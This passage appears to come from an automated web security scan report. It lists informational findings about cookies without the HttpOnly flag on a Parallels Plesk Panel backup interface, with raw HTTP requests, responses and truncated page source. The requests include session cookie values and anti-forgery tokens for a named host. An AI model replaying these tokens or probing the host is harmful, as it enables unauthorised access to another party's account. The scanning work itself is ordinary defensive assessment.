<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Back Up Data Related to the Subscription <span class="name">nosedivesailing.com</span></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.create/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function splitBackupChanged()
{
   if ( $('fid-split_backup_checkbox').checked ) {
       $('fid-split_backup').value = "true";
       $('fid-split_backup_size').enable();
   } else {
       $('fid-split_backup').value = "false";
       $('fid-split_backup_size').disable();
   }
}

function suspendDomainChanged()
{    
   if ( $('fid-suspend_domain_checkbox').checked ) {
       $('fid-suspend').value = "true";
       $('suspend_domain_warning').show();
   } else {
       $('fid-suspend').value = "false";
       $('suspend_domain_warning').hide();
   }
}

function contentChanged()
{    
   content = $('fid-backup_content_all').checked;    
   content_options = $('fid-content_type');
   if( content_options )
       content_options.disabled = !content;
}

function initScreen()
{
   $('fid-split_backup_checkbox').observe('click', splitBackupChanged);
   if( $('fid-suspend_domain_checkbox') )
       $('fid-suspend_domain_checkbox').observe('click', suspendDomainChanged);
   
   splitBackupChanged();
   if( $('fid-suspend_domain_checkbox') )
       suspendDomainChanged();
       

5.14. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/ftp-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/backup/ftp-repository/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:32 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:31 GMT
Connection: close
Content-Length: 20154


5.15. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/ftp-repository/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/backup/ftp-repository/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/local-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:00 GMT
Connection: close
Content-Length: 15143

});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function passiveModeChanged()
{
   if ( $('fid-ftp_passive_mode_checkbox').checked ) {
       $('ftp_passive_mode').value = "true";
   } else {
       $('ftp_passive_mode').value = "false";
   }
}

function initScreen()
{
   $('fid-ftp_passive_mode_checkbox').observe('click', passiveModeChanged);
   passiveModeChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

function update_oC(f)
{
   if (f.ftp_password.value != f.ftp_confirm_password.value) {
       alert('Passwords do not match!');
       return false;
   }
   lsubmit(f);
   return true;
}
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/ftp-repository/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset><legend>Settings</legend>

<table class="formFields" cellspacing="0" width="100%">
   <tr >
       <td class="name"><label for="fid-ftp_server">FTP server hostname or IP&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_server" id="fid-ftp_server" value="" size="35" maxlength="255"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_basedir">Directory for backup files storage&nbsp;</label></td>
       <td><input type="text" name="ftp_basedir" id="fid-ftp_basedir" value="" size="35" maxlength="255"><div class="hint">For example, /myfolder/mybackups/</div></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_login">FTP username&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_login" id="fid-ftp_login" value="" size="35" maxlength="255"></td>
   </tr>
   
   <tr>
       <td class="name">Old FTP password</td>
       <td>None</td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_password">FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_password" id="fid-ftp_password" type="password" value="" size="25"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_confirm_password">Confirm FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_confirm_password" id="fid-ftp_confirm_password" type="password" value="" size="25"></td>
   </tr>
   <tr>
       <td class="name"><label for="fid-ftp_passive_mode_checkbox">Use passive mode</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="ftp_passive_mode_checkbox" id="fid-ftp_passive_mode_checkbox" value="true" />
           <input type="hidden" id="ftp_passive_mode" name="ftp_passive_mode" value="" />
       </td>
   </tr>
</table>

</fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.16. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/local-repository/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/local-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Note that the session cookie sent in the request (PLESKSESSID) is not set by this response, so its flags are not assessed by this finding.

Request

GET /plesk/client@2/domain@1/backup/local-repository/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:17:04 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:17:08 GMT
Connection: close
Content-Length: 19968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3Dfdf080d98498c6ba411aaacb%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Backup Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.local-repository/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/local-repository/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
   <legend>Tools</legend>
   <table width="100%" cellspacing="0" cellpadding="0" border="0">
   <tr><td>
       <div class="screenButtons">
           <DIV class="commonButton" id="bid-backup-now" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Back up the data related to the subscription vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/create/&#039;); return false;" style=""><BUTTON name="bname_backup-now" id="buttonid-backup-now" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/create/&#039;); return false;">Back Up</BUTTON><SPAN id="spanid-backup-now">Back Up</SPAN></DIV>
           <DIV class="commonButton" id="bid-backup-schedule" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for scheduled backup.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/schedule/&#039;); return false;" style=""><BUTTON name="bname_backup-schedule" id="buttonid-backup-schedule" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/schedule/&#039;); return false;">Scheduled Backup Settings</BUTTON><SPAN id="spanid-backup-schedule">Scheduled Backup Settings</SPAN></DIV>
           <DIV class="commonButton" id="bid-upload" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Upload a backup file from your local computer to the server backup repository.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/upload/&#039;); return false;" style=""><BUTTON name="bname_upload" id="buttonid-upload" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/upload/&#039;); return false;">Upload Files to Server Repository</BUTTON><SPAN id="spanid-upload">Upload Files to Server Repository</SPAN></DIV>
           <DIV class="commonButton" id="bid-ftp-settings" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for personal remote FTP repository where backup files should be stored.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/properties/&#039;); return false;" style=""><BUTTON name="bname_ftp-settings" id="buttonid-ftp-settings" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/properties/&#039;); return false;">Personal FTP Repository Settings</BUTTON><SPAN id="spanid-ftp-settings">Personal FTP Repository Settings</SPAN></DIV>
           <DIV class="commonButton" id="bid-dbbackup-repository" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Back up and restore databases.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dbbackup/&#039;); return false;" style=""><BUTTON name="bname_dbbackup-repository" id="buttonid-dbbackup-repository" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dbbackup/&#039;); return false;">Database Backup Repository</BUTTON><SPAN id="spanid-dbbackup-repository">Database Backup Repository</SPAN></DIV>
           <DIV class="commonButton" id="bid-refresh" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Refresh data on the screen.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/&#039;); return false;" style=""><BUTTON name="bname_refresh" id="buttonid-refresh" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/&#039;); return false;">Refresh</BUTTON><SPAN id="spanid-refresh">Refresh</SPAN></DIV>
       </div>
   </td></tr>
   </table>
   </fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Backups</legend>
       <table width="100%" cellspacing="0" cellpadding="0" border="0">
       <tr><td>
           <div id="screenTabs"><div id="tabs"><ul><li class="first" id="current"><A href="/plesk/client@2/domain@1/backup/local-repository/" onClick=";lon();"><span>Server Repository</span></a></li><li><A href="/plesk/client@2/domain@1/backup/ftp-repository/" onClick=";lon();"><span>Personal FTP Repository</span></a></li><li class="last"><A href="/plesk/client@2/domain@1/backup/task@/" onClick=";lon();"><span>Current Backup Tasks</span></a></li></ul></div></div>
       </td></tr>
       <tr><td>
           <div id="list">
               <script>
           function a(event) {tooltip.set(event, [{"type":"string","string":"This is a valid backup. Data can be restored from this backup."}]);}
           function b(event) {tooltip.set(event, [{"type":"string","string":"This is not a valid backup. Data cannot be restored from this file."}]);}
       </script><div class="paging pagingTop noList">No backups</div><div class="paging pagingBottom noList"></div><script>SetCookie("backuplocalrepositorylist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function BackupLocalRepositoryListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function BackupLocalRepositoryListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function BackupLocalRepositoryListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.BackupLocalRepositoryListSelectAll.checked;
                           BackupLocalRepositoryListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function BackupLocalRepositoryListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function BackupLocalRepositoryListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   BackupLocalRepositoryListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListSearchShow()
           {
               var sc = document.getElementById("BackupLocalRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
